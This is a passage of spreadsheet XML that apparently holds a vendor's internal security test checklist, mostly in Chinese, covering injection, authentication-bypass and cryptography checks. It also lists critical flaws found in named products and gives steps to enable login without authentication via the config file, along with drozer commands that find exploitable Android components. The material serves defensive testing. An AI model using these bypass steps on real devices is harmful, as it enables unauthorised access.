HCSEC-1039-1016 Default Open Port not expected to be open as it doesn't correspond to a configured service - 23/TCP TELNET which is enabled by default.
HCSEC-1039-1017 Default Open Port not expected to be open as it doesn't correspond to a configured service - 8023/TCP which is also enabled by default; it is used to proxy TELNET connections from an EMS through the MA5600T to CPE equipment.
HCSEC-1039-1019 Default Open Port not expected to be open as it doesn't correspond to a configured service.
HCSEC-1039-1018 Default Open Port not expected to be open as it doesn't correspond to a configured service - 123/UDP - the MA5600T is configured as an NTP client; this has the side-effect of opening a server port</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查系统中第三方组件的版本是否最新，并查找目录中是否残留的、不使用的、低版本的第三方组件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查应用系统是否使用了OpenSSL 1.0.1g以下的版本</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法1：
1.命令行检查结果为空，则补丁已经打全无遗漏
方法2：
1.通过nessus扫描，未发现因系统补丁缺失引起的漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无此3个文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.系统账号的默认口令符合口令复杂度要求
2.产品资料提示用户定期更新系统账号口令，并提示相关风险</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 红线条款：
8.1.1 系统自身操作维护类口令满足“口令安全要求”。
注：系统指交付给客户运行的整体系统，包括自研的软件、软件运行的操作系统及应用服务在内。
相关解读：
系统帐号的缺省口令（如操作系统、数据库、业务系统），口令应符合复杂度的要求。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.产品提供的安全资料中应包含产品的安全配置/加固指南。其中应包含：
  -安全加固及检查，主要包括操作系统、数据库或WEB服务器等加固内容，需要包含具体的加固内容和操作步骤（必选）
  -应用的安全配置，针对产品业务安全应用，需要启用哪些安全选项，配置哪些内容。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>选择合适的扫描策略，使用Nessus对目标linux服务进行扫描，查看是否存在安全漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.被测试设备正常，配置处于默认状态</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>问题1（致命）：OSMU /rpc 8090端口系统升级未鉴权，导致系统会被恶意损坏。
问题2（致命）：SC部件 SC系统中rest接口不需要登录
问题3（致命）：BIOS没有默认密码，BMC操作员可以通过KVM操作BIOS初始化root用户口令。 
问题4（致命）：USB升级方式，没有认证可以直接进行升级。参看DTS2014082705158
问题5（致命）：VMM模块的task_socket_client函数负责监听端口和收取报文，收取后未作任何认证判断，就根据报文中首字节的命令码来执行对应的命令。参看DTS2014073104686
问题6（致命）：Wifi直连在传输数据的时候，没有经过接受方用户的允许，数据自动接收。参看DTS2014032405856
问题7（致命）：短信通过unicode编码后保存在flash中，通过物理串口登陆可以直接登陆系统查看到存储在flash中的短信内容，没有访问控制机制，可能导致个人数据泄露。
问题8（致命）:telnet等维护管理，通过vty接口登录设备，通过修改配置文件，将vty认证方式修改为“Authencation-mode none”将配置文件替换，重启设备，使配置生效。生效后，无需认证登录即可管理设备，本身这种登录方式极为不安全，不应该保留；None认证方式，命令行中无提示、资料中无说明；但可以通过配置文件生效
问题9（严重）：使用IP作为session认证依据，容易被非法使用，用户IP鉴权，所以相同IP登录时会认为是正常登录。参看DTS2014071503541
问题10（提示）：UMS与U19之间的sip中继认证采用IP认证
问题11（一般）：E5186-22s在用户进行认证后通过对IP进行鉴权，判断操作IP为登陆时认证后的IP后就认为该用户有操作管理权限，容易导致恶意用户直接将其IP地址进行修改后绕过认证进行操作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、资料针对admin和其他管理员的权限描述
2、安全资料（如白皮书、配置手册）是否对三面隔离的配置进行说明
3、系统中是否存在安全资料中未说明的用户名
4、是否存在产品资料中未说明的命令/参数、端口等接入方式（包括但不限于产品的生产、调测、维护用途）
5、安全资料中admin解锁的应急诊断命令说明是否与实际保持一致</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>以/MFS/Share/hadoop-NJ/task/HiBI/HIBI为例</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不存在残留的、不使用的、低版本的第三方组件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>测试环境均处于同一网段</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、列出系统使用的所有第三方组件，方式可以通过黑盒测试的方式获取，如果条件允许，可以直接向开发人员或环境搭建人员获取。
2、获取每个应用组件的版本号。
3、在以下网站http://www.exploit-db.com/的搜索框中输入组件的名称，在搜索结果查看对应的版本是否存在已经披露的漏洞。
4、如果存在被披露的漏洞，根据漏洞提示进行验证。
备注：通过nessus扫描的方式也可以发现此类漏洞，但nessus可能存在一定的误报和漏报，需要对扫描结果进行人工分析。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.通信双方运行正常，且非直连。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>涉及个人数据的接口，比如IMSI读取接口，通话、录音、拍照、收发短信等功能接口，必须提供安全保护机制，否则，恶意软件可以通过这些接口获取用户隐私或干涉用户通信自由。
接口的保护机制，主要包括权限控制和认证机制。对于提供给应用程序的调用的接口，可以使用权限控制机制，应用程序调用该接口前申请相关权限即可；对于用于管理的接口（如通过PC连接），建议使用认证机制，如密码认证。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>10.使用安全的3DES密钥机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>11.使用AES分组密码算法来代替RC4流密码算法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>12.使用RSA算法时要选取合适的公共指数e</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>001 系统或特性的默认设置应保护隐私</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>002 个人数据处理时，须遵守最小化原则</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>003 个人数据收集范围和使用目的不得超出隐私声明</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>004 严格限制收集、访问、使用儿童的个人数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>005 系统或应用配置变更时，须得到用户的同意</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>19.RSA算法进行签名操作时采用PSS填充方式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>004 日志文件持续增多可能导致拒绝服务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>006 在管理面中对操作指令记录要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>007 特殊应用的审计日志记录要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看SecureCat工具扫描报告，确认检查项9.2.8 Disable SSH Root Login是否pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看SecureCat工具扫描报告，确认检查项8.2 Verify That There Are No Accounts With Empty Password Fields是否pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>030 系统帐户的用户的标识（root、oracle、等）必须明确清晰，必须具有单独的、强大的身份验证方案。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>040 检查系统中是否有不需要的服务和软件，以尽量减少系统上可能受到的攻击</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>043 检查elf文件的编译时使用的编译选项是否安全</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>044 检查ASLR/NX开关是否打开，以增加缓冲区溢出利用难度</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>001 测试SSL证书的有效性</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>002 检查产品是否支持证书替换功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>003 检查Web系统使用的Web容器、框架是否存在已知漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>004 检查Web容器的控制台是否已删除</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>005 审核代码注释未泄漏敏感信息(内网IP地址、SQL语句、密码、物理路径等)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>007 Web应用的文件和目录权限最小化</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>008 Web容器日志中，对客户端发的请求记录时，无敏感信息(用户名，口令等信息)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>009 Web容器日志存储位置是否有单独的分区设置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>011 文件扩展名处理测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>012 归档的页面程序文件的扩展名必须使用小写字母</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>015 检查是否存在列目录漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>022 检查是否关闭DWR调试模式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>023 检查对DWR接口的调用是否进行了认证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>024 检查对DWR接口的调用是否进行了权限管理</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>025 连接数据库的帐号密码加密测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>026 Apache安全配置检查</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>028 Jboss安全配置检查</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>029 WebLogic安全配置检查</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>030 在服务端对用户的认证信息进行认证处理</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>031 认证过程不受客户端信息控制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>032 口令设置满足口令策略要求测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>033 提供能够根据组合条件确定允许或者拒绝会话建立的功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>034 同时在线用户数可配置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>035 认证通过后，系统显示上一次认证的历史记录数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>036 重要事务需重新认证，如使用系统转账、余额转移、支付等重要交易。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>065 通过URL参数进行认证模式绕过测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>066 通过SQL注入方式绕过系统认证，进入系统</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>067 找回密码功能漏洞验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>069 通过密码修改功能，修改其它帐户密码</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>070 禁止密码缓存功能验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>071 禁止使用“自动登录/记住我”功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>072 帐号唯一性验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>073 操作员帐号长时间未使用自动锁定可配置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>074 操作员帐号长时间未使用自动锁定</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>075 操作员帐户长时间未使用后自动锁定绕过验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>076 操作员帐号长时间未使用自动锁定后的解锁方式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>077 手工帐号锁定功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>085 会话中不允许修改的信息作为会话状态的一部分在服务器端存储和维护</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>086 管理员能查看用户会话信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>105 加密通道传输会话信息验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>121 检查前端是否存在隐藏字段，指示用户的权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>122 基于页面文件的纵向越权</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>130 通过UNION查询SQL注入</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>132 通过timing attack检查是否存在SQL注入</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>133 检测系统是否存在LDAP注入漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>134 通过LDAP注入绕过系统认证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>135 通过使用LDAP元字符进行注入验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>136 通过使用XML元字符检查是否存在注入</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>137 通过CDATA标记进行XSS注入验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>138 通过实体注入验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>139 标记注入</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>140 检查系统是否存在XPATH注入风险</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>141 XPATH绕过认证验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>143 在HTTP头中进行SSI注入验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>144 PHP使用querystring，测试者可以注入代码</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>145 Struts2框架绕过限制命令执行漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>153 将用户输入作为循环计数器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>154 将用户输入作为创建对象数据处理，导致拒绝服务验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>155 将用户写入的数据写到磁盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>157 通过修改重要参数，检查是否可以完成特定的业务功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>158 跨步骤操作导致验证绕过测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>159 逆向状态迁移验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>160 绕过客户端业务逻辑处理</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>161 针对同一帐户同时进行业务处理操作，导致业务处理错乱问题。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.Web业务运行正常
2.待测网站存在文件上传页面</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Level 1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>002 协议版本安全性测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>004 SSL Renegotiation漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>010 分段信息中明文数据长度限制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>011 bad record mac告警消息满足RFC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看RSA源码是否使用使用OAEP填充方式
2.查看Clipher的指定填充方式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看加密的密钥和向量是否是随机生成的</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>004 AES_CBC_HEX_Util_OLD_ONE模块使用随机生成密钥和安全随机算法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>005 用户的个人数据要保存到应用程序目录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>008 DetailActivity对序列化intent数据适当的处理</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>012 反射型XSS漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>001 Unix/Linux系统中，出厂产品禁止含有UID为0的非root用户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>问题1（严重）：阵列的欧拉操作系统内，存在多个账户的uid为0，比如：ibc_os_hs、_super_admin、admin,不符合公司红线操作系统安全加固要求.
问题2（提示）：系统中有两个UID=0,GID=0的用户。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.目标系统运行正常</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、对于面向最终用户/消费类的产品（如家庭以太网接入设备），如果开启了远程登录功能，检查是否在首次登录时强制用户修改口令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、管理口令是否明文存储在数据库、配置文件、日志、cookie、调试跟踪信息中，业务口令须支持加密，并缺省加密。
2、口令不需要还原的场景（第三方及开源暂不要求）是否使用不可逆的加密算法
3、在口令需要还原的场景是否使用AES128-CBC模式
4、盐值是否是固定的字符串（如：用户名等）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用通过界面上、工具或API接口提供私钥导出功能；
2、非授权用户尝试通过文件读取、下载这些操作系统通用接口获得数字证书私钥。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、替换预置在设备或应用系统中的数字证书
2、产品资料中是否有建议客户替换华为预置的数字证书，并说明建议客户替换华为预置证书的原因，说明不替换预置证书的风险</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.数字证书对应的私钥是否支持按照PKCS标准格式进行安全加密存储
2、对于华为预置颁发的证书或自研系统生成的证书，用于加密私钥的口令的复杂度是否满足口令复杂度要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、是否可以使用特定的组合键（如：ctrl+D键）绕过认证（如：不用输入口令）直接进入系统
2、是否可以使用特定的鼠标操作绕过认证（如：不用输入口令）直接进入系统
3、是否可以通过连接特定的物理或逻辑端口绕过认证，直接进入系统
4、是否可以通过特定的客户端绕过认证，直接进入系统
5、是否可以通过特殊的URL绕过认证，直接进入系统</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、B/S是否使用HTTPS传输
2、C/S是否使用TLS等加密传输</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、传输、存储加密用途的工作密钥是否硬编码在代码里
2、系统设计和功能里是否设计和支持密钥更新方法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、密钥是否明文保存在本地
2、密钥材料及密钥组件在本地保存时是否严格控制其权限（如权限600或400）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、是否使用C标准库函数random()、rand()生成随机数用于安全用途
2、是否使用Java的java.util.Random类生成随机数用于安全用途
3、是否每次调用随机数接口时都设置相同的种子，推荐只在进程初始化的时候设置一次
4、使用java.security.SecureRandom()产生随机数时，是否每次都设置了相同的种子，</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、IV是否是安全随机数
2、IV是否固定（如：写死在代码里）
3、是否使用前一次加密的最后一个密文分组数据作为下一次加密的IV
4、IV是否写在配置文件里
5、IV是否使用某些固定属性，如：某些ID</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用DH算法进行密钥协商的双方在接收到对方发送过来的“公钥”时，应判断公钥的值</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、对于管理面人机登录的场景，查看“自动登录”、“记住我”、“记住密码”等功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、未经数据主体同意，数据控制者私自收集其个人数据（如MSIDN、IMSI、IMEI、URL HOST、URI等）
2、数据控制者采集的个人数据是否在隐私声明里说明或是在收集之前通过弹出框告知数据主体
3、数据控制者是否向数据主体提供授权及撤销授权的机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、产品或服务是否收集隐私声明中没有列出的个人数据，不允许将个人数据用于没有声明的目的
2、个人数据的采集范围、使用目是否与隐私声明中的描述保持一致</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、敏感个人数据是否明文存储在系统日志文件、代码、Cookie中
2、操作人员访问个人数据
3、产品对于个人数据的访问控制策略
4、数据主体的银行卡号的存储</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、识别出业务的用户数据删除场景；
2、结合后台数据库检查用户数据信息是否进行了物理删除；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、对于数据控制者和处理者，个人数据存留期
2、对于数据控制者和处理者，超过存留期后，查看个人数据处理
3、对于数据控制者和处理者，产品运行期间临时产生的包含个人数据的文件，产品运行结束后是否自动删除或匿名化其中的个人数据
4、WIFI直连应用中，导入联系人时是否将联系人信息明文永久暴露在SD卡存储区</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、版本发布前，软件包、升级包、补丁包是否经过完整性验证
2、使用InfoCollector工具上传文件时，是否对文件进行完整性校验</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、是否使用公开的用于调试目的的私钥对软件进行签名
2.对华为开发的软件进行完整性签名时，是否使用华为颁发的代码签名证书对应的私钥进行签名
3、若使用第三方私钥对软件应用进行签名，是否确认该私钥的来源是可信的</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、是否将根证书以证书文件的形式随发布包一起发布</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、默认配置是否使用公网IP
2、公网IP是否被硬编码
3、是否预置固定IP及国内网址</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、在系统启动界面中是否存在隐藏的调试菜单
2、系统安装后是否及时清理不必要的安装文件
4、设备类产品是否提供shell命令行</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、WIFI直连建立后，若WLAN的安全类型默认为WPA/WPA2-PSK模式，则当用户使用过时的安全协议（如wep）时，是否在显示界面或CPI资料提示风险
2、在应用程序中，配置不安全算法
3、在应用程序中，开启ftp或telnet服务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、操作发生的时间、用户ID、事件类型、被访问的资源名称、操作的结果是否记录日志
2、操作过程是否支持可追溯</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、不使用的物理接口
2、需要保留使用的物理接口
3、需保留使用的物理接口暂无认证机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统使用了OpenSSL 1.0.1g以下的版本</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>已升级使用OpenSSL 1.0.1g以上版本</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、在cmd窗口中输入adb  forward  tcp:31415  tcp:31415
2、输入安装drozer的绝对路径c:\drozer\drozer.bat  console  connect
3、将查找出的暴露组件存储到D盘下exploits.txt文件中：run robber.comps.exploits &gt; D:\exploits.txt 
4、查找出以!Exploit EXSIST:开头的暴露组件，评估该暴露组件的风险
备注：参考此工具目录下的《Mercury工具使用小结》。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查看产品详细设计文档，结合对开发人员的访谈，看产品预共享密钥认证的设计实现是否包含下述预防反射攻击的方法：
（1）认证双方采用各自不同的预共享密钥。
（2）认证双方使用不同类型的挑战值。例如：认证发起方发给认证接收方的挑战值的类型为整形，而认证接收方发给认证发起方的挑战值的类型为字符串型。
（3）在加密的认证消息中包含目标实体的身份标识符。
（4）在传递的认证消息中，双方额外添加不同的字符串。例如：客户端发给服务端的消息中添加1100，而服务端发给客户端的消息中添加0011，以分别代表是客户端发送和服务端发送的数据。
（5）对于同一个客户端，在完成一次完整的握手之前，不允许服务端对客户端发起新的认证请求。
（6）在认证中，认证只能由固定的一方发起。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用正常的软件包安装软件，正常的补丁包给产品打补丁，正常的升级包给产品升级，查看各过程是否正常；
2、尝试修改产品软件包、补丁包、升级包，重复第一步，查看各过程是否可以完成；
3、查看产品相关资料，看产品包是否提供完整性校验机制，且完整性校验机制是否足够安全（红线要求：至少采用Hash+盐值的方式，推荐使用数字签名）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查系统是否对规则定义文件rule.dat进行了以数字签名方式的完整性检查,防止通过修改文件来扩展可以恶意利用的功能。
完整性检查方法如下（参考）：
1）在文件完成后使用工具产生该文件的数字签名并保留（工具如：Tripwire）。
2）进行文件完整性检查时，提取文件的数字签名并与之前保留的数字签名进行对比。如果相同，则文件完整性检查成功，文件没有被破坏。如果不相同，则文件完整性可能遭到破坏，需进一步通过与原文件进行对比分析文件被篡改之处。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、通过访谈或查看产品资料（包括早期的产品命令行说明文档），看产品是否支持“authencation-mode none”类似的命令。
2、登陆产品环境，看接口视图、用户管理视图、AAA认证模板视图下是否可以配置none认证命令。
3、修改产品启动时加载的配置文件，将上述none认证命令添加到任何可能配置认证方式的视图下。
4、重启设备，待启动完成，尝试通过配置none认证的接口或使用none认证的用户登陆设备，看是否需要认证。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>根据“三权分立”原则，检测系统用户权限管理是否存在以下三种缺省角色：
1、系统管理员（sysadmin）：具有除角色管理（增删改）权限、密码策略管理权限、设置用户角色权限、用户锁定/解锁权限、日志导出权限以外的所有系统业务操作权限。
2、安全管理员（secadmin）：仅有角色管理权限、操作日志查看权限、密码策略管理权限、查看用户权限、激活用户权限、用户锁定/解锁权限。
3、安全审计员（secauditor）：仅有日志查看和日志导出权限。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查看产品文档，分析产品认证模型，如果是基于动态口令的认证方式，是否同时结合了静态口令认证。
2、访问系统认证页面，查看是否同时使用动态口令和静态口令双因素认证。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查SNMP协议版本。
2.检查/etc/snmp/snmpd.conf文件。
3.出现“group MyROGroup v1 readonly”表示协议版本为v1，出现“group MyROGroup v2c readonly”表示协议版本为v2c，出现“rouser xxxx”表示协议版本为v3。
4.如果未出现以上关键字，请检查产品是否需要配置snmp。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.创建SFTP账户，把目录盘符设置成系统根目录（linux系统）或者系统盘符根目录（windows系统）。
2.创建SFTP账户，把目录盘符设置成一个较低层级的目录。
3.使用SFTP账户正常登录，尝试登录其主目录以外的目录，看是否可以成功打开目标目录。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查该文件夹及文件是否仅单一用户使用。
2.检查该用户对本文件夹及文件的权限。
3.检查该用户所在组其他用户对本文件夹及文件的权限。
4.检查其他组用户对本文件夹及文件的访问权限。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.找出该文件夹及文件所有的用户，并确定用户的权限级别。
2.检查最高级别用户对目标文件夹及文件的权限。
3.检查最高级别用户所在组其他用户对目标文件夹及文件的权限。
4.检查其他级别用户对目标文件夹及文件的访问权限。
5.检查其他用户对目标文件夹及文件的访问权限。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查系统中不同应用服务的运行账号。
备注：Linux系统可以使用ps -ef命令；Windows系统可以查看任务管理器。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、根据产品支持的特性，分析工作密钥的使用。查找源码，看工作密钥在系统中存储时，是否由根密钥加密，且不同的应用是否使用不同的工作密钥。
2、查找密钥的使用过程，看密钥、密钥材料一次使用完成后，是否及时清除。
3、查看产品文档，看是否有相关根密钥、工作密钥导出方法的说明。
